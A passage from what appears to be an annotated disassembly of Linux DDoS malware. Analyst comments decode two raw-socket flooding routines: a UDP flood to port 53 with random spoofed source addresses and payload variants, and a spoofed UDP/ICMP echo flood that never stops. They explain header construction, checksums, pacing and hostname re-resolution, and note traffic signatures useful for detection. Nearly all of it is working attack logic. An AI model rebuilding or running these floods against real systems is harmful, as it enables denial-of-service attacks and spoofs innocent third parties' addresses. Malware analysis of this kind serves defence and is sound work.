jnz short loc_8049514 push 300 call usleep ; usleep(300) mov [ebp+lookup_stepper], 0 loc_8049507: ; CODE XREF: sub_8049174+372j dec 
[ebp+lookup_counter]
        add esp, 4
        jmp short loc_804951A
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_8049514:                            ; CODE XREF: sub_8049174+37Dj
        inc [ebp+lookup_stepper]
loc_804951A:                            ; CODE XREF: sub_8049174+39Cj
        add [ebp+destip], 4
        mov ebx, [ebp+destip]
        cmp dword ptr [ebx], 0
        jnz loc_8049308
loc_8049530:                            ; CODE XREF: sub_8049174+17Ej
        add [ebp+offset], 32h
        inc edi                         ; edi++
        cmp edi, 8
        jle inner_loop
        jmp outer_loop
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
bail_out:                               ; CODE XREF: sub_8049174+AFj
        mov ds:child_pid, 0             ; child_pid = 0
        xor eax, eax                    ; return 0
        lea esp, [ebp+saved_regs]       ; cleanup & restore the stack
        pop ebx                         ; |
        pop esi                         ; |
        pop edi                         ; |
        mov esp, ebp                    ; |
        pop ebp                         ; v
        retn
sub_8049174 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
;
; sub_8049564 -- raw-socket UDP flood worker toward one destination.
; Never returns on its own: the only exit is bail_out when socket() fails.
;
; Stack arguments (see equates below):
;   dstaddr_a..d / srcaddr_a..d  IPv4 octets of destination and source. When all
;                                four srcaddr octets are 0, every packet gets a
;                                fresh random (spoofed) source address.
;   lookup_step                  send pacing (named by the analyst; used here as a
;                                "sleep every N packets" counter, see loc_8049990).
;   srcport_hi / srcport_lo      fixed UDP source port (hi<<8 | lo); 0/0 = random
;                                in 0..29999.
;   use_dsthost / dsthost        when set, dsthost is resolved with gethostbyname()
;                                and re-resolved every 40000 packets; on failure
;                                sleep(600) and retry (the loop never gives up).
;
; Packet layout in `buffer` (1024 bytes, memset to 0 once): 20-byte IPv4 header,
; 8-byte UDP header, then a payload copied from payload_table (9 variants spaced
; 50 bytes apart, sizes from length_table). Per packet the code sets: IP
; version/IHL = 45h, TTL = 120 + random()%130, ID = random()%255, protocol 17,
; UDP destination port 53 (3500h stored little-endian = htons(53)), UDP checksum
; 0, payload[0..1] random. These constants are the observable signature of the
; traffic. sendto() return values are never checked.
;
; Attributes: bp-based frame hidden
sub_8049564 proc near                   ; CODE XREF: main+D72p
saved_regs = dword ptr -698h
var_68C = dword ptr -68Ch
offset = dword ptr -688h
lookup_counter = dword ptr -684h
lookup_stepper = dword ptr -680h
payload = dword ptr -67Ch
udphdr = dword ptr -678h
sockfd = dword ptr -674h
save_srcaddr_d = dword ptr -670h
save_srcaddr_c = dword ptr -66Ch
save_srcaddr_b = dword ptr -668h
save_srcaddr_a = dword ptr -664h
save_dstaddr_d = dword ptr -660h
save_dstaddr_c = dword ptr -65Ch
save_dstaddr_b = dword ptr -658h
save_dstaddr_a = dword ptr -654h
checksum = word ptr -64Eh
ipaddr = dword ptr -64Ch
dstaddr_buf = byte ptr -648h
buffer = byte ptr -628h
dstaddr = byte ptr -228h
payloads = byte ptr -218h
lengths = dword ptr -24h
dstaddr_a = dword ptr 8
dstaddr_b = dword ptr 0Ch
dstaddr_c = dword ptr 10h
dstaddr_d = dword ptr 14h
srcaddr_a = dword ptr 18h
srcaddr_b = dword ptr 1Ch
srcaddr_c = dword ptr 20h
srcaddr_d = dword ptr 24h
lookup_step = dword ptr 28h
srcport_hi = dword ptr 2Ch
srcport_lo = dword ptr 30h
use_dsthost = dword ptr 34h
dsthost = dword ptr 38h
        push ebp                        ; initialize stack & preserve registers
        mov ebp, esp                    ; |
        sub esp, 68Ch                   ; |
        push edi                        ; |
        push esi                        ; |
        push ebx                        ; v
        ; only the low byte of each dword argument is kept (octets 0..255)
        mov bl, byte ptr [ebp+dstaddr_a]
        mov byte ptr [ebp+save_dstaddr_a], bl ; save_dstaddr_a = dstaddr_a
        mov bl, byte ptr [ebp+dstaddr_b]
        mov byte ptr [ebp+save_dstaddr_b], bl ; save_dstaddr_b = dstaddr_b
        mov bl, byte ptr [ebp+dstaddr_c]
        mov byte ptr [ebp+save_dstaddr_c], bl ; save_dstaddr_c = dstaddr_c
        mov bl, byte ptr [ebp+dstaddr_d]
        mov byte ptr [ebp+save_dstaddr_d], bl ; save_dstaddr_d = dstaddr_d
        mov bl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_srcaddr_a], bl ; save_srcaddr_a = srcaddr_a
        mov bl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_srcaddr_b], bl ; save_srcaddr_b = srcaddr_b
        mov bl, byte ptr [ebp+srcaddr_c]
        mov byte ptr [ebp+save_srcaddr_c], bl ; save_srcaddr_c = srcaddr_c
        mov bl, byte ptr [ebp+srcaddr_d]
        mov byte ptr [ebp+save_srcaddr_d], bl ; save_srcaddr_d = srcaddr_d
        lea edi, [ebp+lengths]
        mov esi, offset length_table
        cld
        mov ecx, 9
        repe movsd                      ; memcpy(lengths, length_table, sizeof(length_table)) -- 9 dwords
        lea edi, [ebp+payloads]
        mov esi, offset payload_table
        cld
        mov ecx, 7Dh
        repe movsd                      ; memcpy(payloads, payload_table, sizeof(payload_table)) -- 7Dh dwords = 500 bytes
        lea edi, [ebp+buffer]           ; iphdr = (struct iphdr *)buffer  (edi keeps this for the whole routine)
        lea ebx, [ebp+buffer+14h]
        mov [ebp+udphdr], ebx           ; udphdr = (struct udphdr *)(buffer + sizeof(struct iphdr))
        lea ebx, [ebp+buffer+1Ch]
        mov [ebp+payload], ebx          ; payload = buffer + sizeof(struct iphdr) + sizeof(struct udphdr)
        mov word ptr [ebp+dstaddr], 2   ; dstaddr.sin_family = AF_INET
        mov word ptr [ebp+dstaddr+2], 0 ; dstaddr.sin_port = 0
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049645
        ; numeric destination: render the four octets once into dstaddr_buf
        movzx eax, byte ptr [ebp+save_dstaddr_d]
        push eax                        ; save_dstaddr_d
        movzx eax, byte ptr [ebp+save_dstaddr_c]
        push eax                        ; save_dstaddr_c
        movzx eax, byte ptr [ebp+save_dstaddr_b]
        push eax                        ; save_dstaddr_b
        movzx eax, byte ptr [ebp+save_dstaddr_a]
        push eax                        ; save_dstaddr_a
        push offset aD_D_D_D            ; "%d.%d.%d.%d"
        lea eax, [ebp+dstaddr_buf]
        push eax                        ; dstaddr_buf
        call sprintf                    ; sprintf(dstaddr_buf, "%d.%d.%d.%d", save_dstaddr_a, save_dstaddr_b, save_dstaddr_c, save_dstaddr_d)
        add esp, 18h
loc_8049645:                            ; CODE XREF: sub_8049564+ABj
        cmp [ebp+lookup_step], 0
        jz short loc_804964E
        dec [ebp+lookup_step]           ; pacing argument N > 0 becomes N-1 (compared against lookup_stepper below)
loc_804964E:                            ; CODE XREF: sub_8049564+E5j
        push 0FFh                       ; *reserved*
        push 3                          ; SOCK_RAW
        push 2                          ; PF_INET
        call socket                     ; socket(PF_INET, SOCK_RAW, 0xFF) -- needs raw-socket privilege
        mov [ebp+sockfd], eax
        add esp, 0Ch
        test eax, eax
        jle bail_out                    ; socket() failed (or returned fd 0): clear child_pid and return 0
        mov [ebp+lookup_stepper], 0     ; lookup_stepper = 0
        mov [ebp+lookup_counter], 0     ; lookup_counter = 0
        push 400h
        push 0
        push edi
        call memset                     ; memset(buffer, 0, sizeof(buffer)) -- 1024 bytes, done once
        add esp, 0Ch
        db 8Dh,76h,0                    ; lea esi, [esi+0]
outer_loop:                             ; CODE XREF: sub_8049564+19Aj
                                        ; sub_8049564+46Fj
        ; esi is a "retry" flag here: set to 1 when gethostbyname() fails so the
        ; loop restarts without sending anything
        xor esi, esi
        cmp [ebp+use_dsthost], 0
        jz short loc_80496FC
        cmp [ebp+lookup_counter], 0
        jg short loc_80496FC            ; re-resolve only when the 40000-packet budget is used up
        mov ebx, [ebp+dsthost]
        push ebx
        call gethostbyname              ; gethostbyname(dsthost)
        mov edx, eax
        add esp, 4
        test edx, edx
        jnz short loc_80496CC
        push 600
        call sleep                      ; sleep(600) -- resolution failed; back off ten minutes and retry forever
        mov esi, 1
        add esp, 4
        jmp short loc_80496FC
; ---------------------------------------------------------------------------
        align 4
loc_80496CC:                            ; CODE XREF: sub_8049564+151j
        push 4                          ; 4
        lea eax, [ebp+ipaddr]
        push eax                        ; &ipaddr
        mov eax, [edx+10h]
        mov eax, [eax]
        push eax                        ; he->h_addr (he->h_addr_list[0])
        call bcopy                      ; bcopy(he->h_addr, &ipaddr, 4)
        mov eax, [ebp+ipaddr]
        mov [edi+10h], eax              ; iphdr->daddr = ipaddr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = ipaddr;
        mov [ebp+lookup_counter], 40000 ; packets until the next DNS lookup
        add esp, 0Ch
loc_80496FC:                            ; CODE XREF: sub_8049564+136j
                                        ; sub_8049564+13Fj ...
        test esi, esi
        jnz short outer_loop
        xor esi, esi                    ; esi = payload variant index, 0..8
        mov [ebp+offset], ebp           ; offset starts at ebp so that (offset - 218h) == &payloads[0]; +50 per variant
inner_loop:                             ; CODE XREF: sub_8049564+469j
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049723
        lea eax, [ebp+dstaddr_buf]
        push eax
        call inet_addr                  ; inet_addr(dstaddr_buf)
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = inet_addr(dstaddr_buf)
        add esp, 4
loc_8049723:                            ; CODE XREF: sub_8049564+1A8j
        mov edx, [ebp+offset]
        add edx, -218h                  ; edx = &payloads[50 * esi]
        mov eax, [ebp+esi*4+lengths]
        push eax                        ; lengths[esi]
        push edx                        ; payloads + 50 * esi
        mov ebx, [ebp+payload]
        push ebx                        ; payload
        call memcpy                     ; memcpy(payload, payloads + 50 * esi, lengths[esi])
        add esp, 0Ch
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov ebx, [ebp+payload]
        mov [ebx], dl                   ; payload[0] = random() % 255
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov ebx, [ebp+payload]
        mov [ebx+1], dl                 ; payload[1] = random() % 255
        cmp [ebp+srcport_hi], 0
        jnz short loc_804978C
        cmp [ebp+srcport_lo], 0
        jnz short loc_804978C
        call __random
        mov ebx, 30000
        cdq
        idiv ebx
        mov eax, edx                    ; no fixed port given: source port = random() % 30000
        jmp short loc_8049796
; ---------------------------------------------------------------------------
loc_804978C:                            ; CODE XREF: sub_8049564+20Fj
                                        ; sub_8049564+215j
        mov eax, [ebp+srcport_hi]
        shl eax, 8
        add ax, word ptr [ebp+srcport_lo] ; source port = (srcport_hi << 8) | srcport_lo
loc_8049796:                            ; CODE XREF: sub_8049564+226j
        xchg al, ah                     ; htons()
        mov ebx, [ebp+udphdr]
        mov [ebx], ax                   ; udphdr->source
        mov ebx, [ebp+udphdr]
        mov word ptr [ebx+2], 3500h     ; udphdr->dest = htons(53) -- every packet targets the DNS port
        mov ax, word ptr [ebp+esi*4+lengths]
        add ax, 8
        xchg al, ah
        mov [ebx+4], ax                 ; udphdr->len = htons(lengths[esi] + 8)
        mov word ptr [ebx+6], 0         ; udphdr->check = 0 (no UDP checksum)
        ; source address: the srcaddr octets, or, when all four are 0, a random
        ; byte per octet (a value of 0FFh is bumped to 0 by the setnb/add pair)
        cmp byte ptr [ebp+save_srcaddr_a], 0
        jnz short loc_804983C
        cmp byte ptr [ebp+save_srcaddr_b], 0
        jnz short loc_804983C
        cmp byte ptr [ebp+save_srcaddr_c], 0
        jnz short loc_804983C
        cmp byte ptr [ebp+save_srcaddr_d], 0
        jnz short loc_804983C
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Ch], dl        ; iphdr->saddr octet 1 (random)
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Dh], dl        ; iphdr->saddr octet 2 (random)
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Eh], dl        ; iphdr->saddr octet 3 (random)
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Fh], dl        ; iphdr->saddr octet 4 (random)
        jmp short loc_804986C
; ---------------------------------------------------------------------------
loc_804983C:                            ; CODE XREF: sub_8049564+265j
                                        ; sub_8049564+26Ej ...
        mov bl, byte ptr [ebp+save_srcaddr_a]
        mov [ebp+buffer+0Ch], bl        ; iphdr->saddr = srcaddr octets as given
        mov bl, byte ptr [ebp+save_srcaddr_b]
        mov [ebp+buffer+0Dh], bl
        mov bl, byte ptr [ebp+save_srcaddr_c]
        mov [ebp+buffer+0Eh], bl
        mov bl, byte ptr [ebp+save_srcaddr_d]
        mov [ebp+buffer+0Fh], bl
loc_804986C:                            ; CODE XREF: sub_8049564+2D6j
        cmp [ebp+use_dsthost], 0
        jnz short loc_80498A2           ; hostname mode: iphdr->daddr was set from the lookup in outer_loop
        mov bl, byte ptr [ebp+save_dstaddr_a]
        mov [ebp+buffer+10h], bl        ; iphdr->daddr = dstaddr octets
        mov bl, byte ptr [ebp+save_dstaddr_b]
        mov [ebp+buffer+11h], bl
        mov bl, byte ptr [ebp+save_dstaddr_c]
        mov [ebp+buffer+12h], bl
        mov bl, byte ptr [ebp+save_dstaddr_d]
        mov [ebp+buffer+13h], bl
loc_80498A2:                            ; CODE XREF: sub_8049564+30Cj
        mov byte ptr [edi], 45h         ; iphdr->version = 4, ihl = 5
        call __random
        mov ebx, 130
        cdq
        idiv ebx
        add dl, 120
        mov [edi+8], dl                 ; iphdr->ttl = 120 + random() % 130  (120..249)
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov [edi+4], dx                 ; iphdr->id = random() % 255 (not byte-swapped)
        mov byte ptr [edi+9], 11h       ; iphdr->protocol = IPPROTO_UDP
        mov word ptr [edi+6], 0         ; iphdr->frag_off = 0
        mov ax, word ptr [ebp+esi*4+lengths]
        add ax, 1Ch
        xchg al, ah
        mov [edi+2], ax                 ; iphdr->tot_len = htons(lengths[esi] + 28)
        mov word ptr [edi+0Ah], 0       ; iphdr->check = 0 before summing
        ; ones'-complement sum of the 20-byte IP header: edx = bytes left, ecx = sum;
        ; a trailing odd byte (never here, 20 is even) would be added via `checksum`
        mov edx, 14h                    ; x = sizeof(struct iphdr)
        lea ebx, [ebp+buffer]
        mov [ebp+var_68C], ebx
        xor ecx, ecx
        mov [ebp+checksum], 0
loc_8049904:                            ; CODE XREF: sub_8049564+3BAj
        mov ebx, [ebp+var_68C]
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        mov [ebp+var_68C], ebx
        add edx, -2
        cmp edx, 1
        jg short loc_8049904
        jnz short loc_8049933
        mov al, [ebx]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ecx, eax
loc_8049933:                            ; CODE XREF: sub_8049564+3BCj
        ; fold the 32-bit sum into 16 bits twice, then complement
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx]
        mov eax, ecx
        sar eax, 10h
        add ecx, eax
        mov eax, ecx
        not ax
        mov [ebp+checksum], ax
        mov [edi+0Ah], ax               ; iphdr->check
        push 10h                        ; sizeof(dstaddr)
        lea eax, [ebp+dstaddr]
        push eax                        ; &dstaddr
        push 0                          ; flags
        mov eax, [ebp+esi*4+lengths]
        add eax, 1Ch
        push eax                        ; lengths[esi] + 28
        lea eax, [ebp+buffer]
        push eax                        ; buffer
        mov ebx, [ebp+sockfd]
        push ebx                        ; sockfd
        call sendto                     ; sendto(sockfd, buffer, lengths[esi] + 28, 0, &dstaddr, 16) -- result ignored
        add esp, 18h
        ; pacing: lookup_step == 0 -> usleep(300) after every packet;
        ; otherwise usleep(300) only when lookup_stepper reaches lookup_step
        cmp [ebp+lookup_step], 0
        jnz short loc_8049990
        push 12Ch
        call usleep                     ; usleep(300)
        jmp short loc_80499AF
; ---------------------------------------------------------------------------
loc_8049990:                            ; CODE XREF: sub_8049564+41Ej
        mov ebx, [ebp+lookup_step]
        cmp [ebp+lookup_stepper], ebx
        jnz short loc_80499BC
        push 12Ch
        call usleep                     ; usleep(300)
        mov [ebp+lookup_stepper], 0
loc_80499AF:                            ; CODE XREF: sub_8049564+42Aj
        dec [ebp+lookup_counter]        ; only counted down on the sleep paths; <= 0 re-triggers the DNS lookup
        add esp, 4
        jmp short loc_80499C2
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_80499BC:                            ; CODE XREF: sub_8049564+435j
        inc [ebp+lookup_stepper]
loc_80499C2:                            ; CODE XREF: sub_8049564+454j
        add [ebp+offset], 50            ; next payload variant
        inc esi
        cmp esi, 8
        jle inner_loop                  ; 9 variants per pass ...
        jmp outer_loop                  ; ... then start over; there is no exit condition
; ---------------------------------------------------------------------------
bail_out:                               ; CODE XREF: sub_8049564+103j
        mov ds:child_pid, 0             ; child_pid = 0
        xor eax, eax                    ; return 0;
        lea esp, [ebp+saved_regs]       ; cleanup & restore the stack
        pop ebx                         ; |
        pop esi                         ; |
        pop edi                         ; |
        mov esp, ebp                    ; |
        pop ebp                         ; v
        retn
sub_8049564 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
;
; sub_80499F4 -- single-packet raw-socket flooder (UDP or ICMP echo request)
; toward one destination. Runs forever; the only exit is bail_out when socket()
; fails.
;
; Stack arguments:
;   do_udp                    non-zero: UDP (protocol 17, random source port,
;                             destination port `dstport`, 1 byte of payload 'a');
;                             zero: ICMP type 8 / code 0 (echo request).
;   dstport                   UDP destination port (UDP mode only).
;   dstaddr_a..d / srcaddr_a..d  IPv4 octets; the source is always taken from the
;                             srcaddr octets (spoofed, no random option here).
;   use_dsthost / dsthost     hostname mode: re-resolved every 40000 iterations,
;                             sleep(600) and retry when resolution fails.
;
; The 29-byte packet (pktlen = 1Dh = 20 + 8 + 1) is built once before the send
; loop and then sent twice per iteration with usleep(20) between pairs. Two
; things worth knowing when analysing captures: the IP total length (1C28h), ID
; (5504h) and fragment word (0FE1Fh) are stored as little-endian immediates, so
; as written they do not describe a 29-byte unfragmented datagram (whether the
; kernel rewrites them for this raw socket is not visible here); and in UDP mode
; the UDP checksum is summed over the 9 header+payload bytes without the IPv4
; pseudo-header and *before* var_14 is set to 'a', so it is almost certainly
; invalid on the wire. In hostname mode iphdr->daddr is updated inside the loop
; after the IP checksum was computed, so that checksum is stale as well.
;
; Attributes: bp-based frame hidden
sub_80499F4 proc near                   ; CODE XREF: main+74Ep
saved_regs = dword ptr -0ACh
ptr_dstaddr = dword ptr -0A0h
pktlen = dword ptr -9Ch
sockfd = dword ptr -98h
save_srcaddr_c = dword ptr -94h
save_srcaddr_b = dword ptr -90h
save_srcaddr_a = dword ptr -8Ch
save_dstaddr_d = dword ptr -88h
save_dstaddr_c = dword ptr -84h
save_dstaddr_b = dword ptr -80h
save_dstaddr_a = dword ptr -7Ch
ipaddr = dword ptr -78h
checksum = word ptr -72h
srcaddr_buf = byte ptr -70h
dstaddr_buf = byte ptr -50h
iphdr = byte ptr -30h
udphdr = word ptr -1Ch
var_14 = byte ptr -14h
dstaddr = byte ptr -10h
do_udp = dword ptr 8
dstport = word ptr 0Ch
dstaddr_a = dword ptr 10h
dstaddr_b = dword ptr 14h
dstaddr_c = dword ptr 18h
dstaddr_d = dword ptr 1Ch
srcaddr_a = dword ptr 20h
srcaddr_b = dword ptr 24h
srcaddr_c = dword ptr 28h
srcaddr_d = dword ptr 2Ch
use_dsthost = dword ptr 30h
dsthost = dword ptr 34h
        push ebp                        ; initialize the stack & preserve registers
        mov ebp, esp                    ; |
        sub esp, 0A0h                   ; |
        push edi                        ; |
        push esi                        ; |
        push ebx                        ; v
        mov cl, byte ptr [ebp+dstaddr_a]
        mov byte ptr [ebp+save_dstaddr_a], cl
        mov cl, byte ptr [ebp+dstaddr_b]
        mov byte ptr [ebp+save_dstaddr_b], cl
        mov cl, byte ptr [ebp+dstaddr_c]
        mov byte ptr [ebp+save_dstaddr_c], cl
        mov cl, byte ptr [ebp+dstaddr_d]
        mov byte ptr [ebp+save_dstaddr_d], cl
        mov cl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_srcaddr_a], cl
        mov cl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_srcaddr_b], cl
        mov cl, byte ptr [ebp+srcaddr_c]
        mov byte ptr [ebp+save_srcaddr_c], cl
        mov bl, byte ptr [ebp+srcaddr_d] ; the 4th source octet stays in bl (no save slot)
        mov word ptr [ebp+dstaddr], 2   ; dstaddr.sin_family = AF_INET
        call __random
        mov ecx, 0FFh
        cdq
        idiv ecx
        mov eax, edx
        xchg al, ah
        mov word ptr [ebp+dstaddr+2], ax ; dstaddr.sin_port = htons(random() % 255)
        movzx eax, bl
        push eax                        ; srcaddr_d
        movzx eax, byte ptr [ebp+save_srcaddr_c]
        push eax
        movzx eax, byte ptr [ebp+save_srcaddr_b]
        push eax
        movzx eax, byte ptr [ebp+save_srcaddr_a]
        push eax
        push offset aD_D_D_D            ; "%d.%d.%d.%d"
        lea esi, [ebp+srcaddr_buf]
        push esi
        call sprintf                    ; sprintf(srcaddr_buf, "%d.%d.%d.%d", a, b, c, d) -- esi keeps &srcaddr_buf
        add esp, 18h
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049ABE
        movzx eax, byte ptr [ebp+save_dstaddr_d]
        push eax
        movzx eax, byte ptr [ebp+save_dstaddr_c]
        push eax
        movzx eax, byte ptr [ebp+save_dstaddr_b]
        push eax
        movzx eax, byte ptr [ebp+save_dstaddr_a]
        push eax
        push offset aD_D_D_D            ; "%d.%d.%d.%d"
        lea ebx, [ebp+dstaddr_buf]
        push ebx
        call sprintf                    ; sprintf(dstaddr_buf, "%d.%d.%d.%d", ...)
        push ebx
        call inet_addr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = inet_addr(dstaddr_buf)
        add esp, 1Ch
loc_8049ABE:                            ; CODE XREF: sub_80499F4+94j
        push 0FFh                       ; *reserved*
        push 3                          ; SOCK_RAW
        push 2                          ; PF_INET
        call socket                     ; socket(PF_INET, SOCK_RAW, 0xFF)
        mov [ebp+sockfd], eax
        add esp, 0Ch
        test eax, eax
        jle bail_out
        mov [ebp+iphdr], 45h            ; version 4, ihl 5
        mov word ptr [ebp+iphdr+2], 1C28h ; tot_len as stored (little-endian immediate, see header note)
        mov word ptr [ebp+iphdr+4], 5504h ; id, constant
        call __random
        mov ecx, 130
        cdq
        idiv ecx
        add dl, 120
        mov [ebp+iphdr+8], dl           ; ttl = 120 + random() % 130, chosen once per run
        push esi
        call inet_addr
        mov dword ptr [ebp+iphdr+0Ch], eax ; saddr = inet_addr(srcaddr_buf)
        add esp, 4
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049B21
        lea eax, [ebp+dstaddr_buf]
        push eax
        call inet_addr
        mov dword ptr [ebp+iphdr+10h], eax ; daddr = inet_addr(dstaddr_buf)
        add esp, 4
loc_8049B21:                            ; CODE XREF: sub_80499F4+11Cj
        mov word ptr [ebp+iphdr+6], 0FE1Fh ; frag_off as stored (see header note)
        mov word ptr [ebp+iphdr+0Ah], 0 ; check = 0 before summing
        cmp [ebp+do_udp], 0
        jz short loc_8049BB0
        ; --- UDP variant ---
        mov [ebp+iphdr+9], 11h          ; protocol = IPPROTO_UDP
        call __random
        mov ecx, 0FFh
        cdq
        idiv ecx
        mov eax, edx
        xchg al, ah
        mov [ebp+udphdr], ax            ; udphdr->source = htons(random() % 255)
        mov ax, [ebp+dstport]
        xchg al, ah
        mov [ebp+udphdr+2], ax          ; udphdr->dest = htons(dstport)
        mov [ebp+udphdr+4], 900h        ; udphdr->len = htons(9)
        ; sum the 9 bytes udphdr[0..8] (8-byte header + var_14); note var_14 is
        ; assigned only after this loop
        mov edx, 9
        lea esi, [ebp+udphdr]
        xor ebx, ebx
        mov [ebp+checksum], 0
loc_8049B6C:                            ; CODE XREF: sub_80499F4+186j
        movzx eax, word ptr [esi]
        add ebx, eax
        add esi, 2
        add edx, -2
        cmp edx, 1
        jg short loc_8049B6C
        jnz short loc_8049B89
        mov al, [esi]                   ; odd trailing byte
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ebx, eax
loc_8049B89:                            ; CODE XREF: sub_80499F4+188j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx]
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+checksum], ax
        mov [ebp+udphdr+6], ax          ; udphdr->check (no pseudo-header included)
        mov [ebp+var_14], 61h           ; payload byte 'a' -- written after the checksum above covered it
        jmp short loc_8049C10
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_8049BB0:                            ; CODE XREF: sub_80499F4+13Dj
        ; --- ICMP variant: echo request, var_14 is left as found on the stack ---
        mov [ebp+iphdr+9], 1            ; protocol = IPPROTO_ICMP
        mov byte ptr [ebp+udphdr], 8    ; icmp type 8 (echo request)
        mov byte ptr [ebp+udphdr+1], 0  ; icmp code 0
        mov [ebp+udphdr+2], 0           ; icmp checksum = 0 before summing
        mov edx, 9
        lea esi, [ebp+udphdr]
        xor ebx, ebx
        mov [ebp+checksum], 0
        lea esi, [esi]
loc_8049BD4:                            ; CODE XREF: sub_80499F4+1EEj
        movzx eax, word ptr [esi]
        add ebx, eax
        add esi, 2
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_8049BD4
        jnz short loc_8049BF1
        mov al, [esi]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ebx, eax
loc_8049BF1:                            ; CODE XREF: sub_80499F4+1F0j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx]
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+checksum], ax
        mov [ebp+udphdr+2], ax          ; icmp checksum
loc_8049C10:                            ; CODE XREF: sub_80499F4+1B8j
        mov [ebp+pktlen], 1Dh           ; 29 bytes on the wire: 20 (IP) + 8 (UDP/ICMP) + 1
        ; IP header checksum over 20 bytes (computed once; not refreshed when
        ; daddr changes in hostname mode below)
        mov edx, 14h
        lea esi, [ebp+iphdr]
        xor ebx, ebx
        mov [ebp+checksum], 0
        lea esi, [esi]
loc_8049C2C:                            ; CODE XREF: sub_80499F4+246j
        movzx eax, word ptr [esi]
        add ebx, eax
        add esi, 2
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_8049C2C
        jnz short loc_8049C49
        mov al, [esi]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ebx, eax
loc_8049C49:                            ; CODE XREF: sub_80499F4+248j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx]
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+checksum], ax
        mov word ptr [ebp+iphdr+0Ah], ax ; iphdr->check
        xor ebx, ebx                    ; ebx = packets left before re-resolving dsthost
        lea ecx, [ebp+dstaddr]
        mov [ebp+ptr_dstaddr], ecx
        lea edi, [ebp+iphdr]            ; edi = &iphdr (the send buffer)
        lea esi, [esi]
loc_8049C78:                            ; CODE XREF: sub_80499F4+32Aj
        xor esi, esi                    ; esi = "skip this iteration" flag
        cmp [ebp+use_dsthost], 0
        jz short loc_8049CCE
        test ebx, ebx
        jg short loc_8049CCE
        mov ecx, [ebp+dsthost]
        push ecx
        call gethostbyname              ; gethostbyname(dsthost)
        mov edx, eax
        add esp, 4
        test edx, edx
        jnz short loc_8049CAC
        push 600
        call sleep                      ; sleep(600) and retry
        mov esi, 1
        add esp, 4
        jmp short loc_8049CCE
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_8049CAC:                            ; CODE XREF: sub_80499F4+2A0j
        push 4
        lea eax, [ebp+ipaddr]
        push eax
        mov eax, [edx+10h]
        mov eax, [eax]
        push eax
        call bcopy                      ; bcopy(he->h_addr, &ipaddr, 4)
        mov eax, [ebp+ipaddr]
        mov dword ptr [ebp+iphdr+10h], eax ; iphdr->daddr = ipaddr (IP checksum not recomputed)
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = ipaddr
        mov ebx, 40000
        add esp, 0Ch
loc_8049CCE:                            ; CODE XREF: sub_80499F4+28Aj
                                        ; sub_80499F4+28Ej ...
        test esi, esi
        jnz short loc_8049D1D
        ; the same packet is sent twice per iteration, then usleep(20)
        push 10h                        ; sizeof(dstaddr)
        mov ecx, [ebp+ptr_dstaddr]
        push ecx                        ; &dstaddr
        push 0                          ; flags
        mov ecx, [ebp+pktlen]
        push ecx                        ; 29
        push edi                        ; &iphdr
        mov ecx, [ebp+sockfd]
        push ecx                        ; sockfd
        call sendto                     ; sendto(sockfd, &iphdr, 29, 0, &dstaddr, 16)
        push 10h
        mov ecx, [ebp+ptr_dstaddr]
        push ecx
        push 0
        mov ecx, [ebp+pktlen]
        push ecx
        push edi
        mov ecx, [ebp+sockfd]
        push ecx
        call sendto                     ; second copy
        add esp, 30h
        push 20
        call usleep                     ; usleep(20)
        add esp, 4
loc_8049D1D:                            ; CODE XREF: sub_80499F4+2DCj
        dec ebx
        jmp loc_8049C78                 ; unconditional: the loop never terminates
; ---------------------------------------------------------------------------
        align 4
bail_out:                               ; CODE XREF: sub_80499F4+E3j
        mov ds:child_pid, 0             ; child_pid = 0;
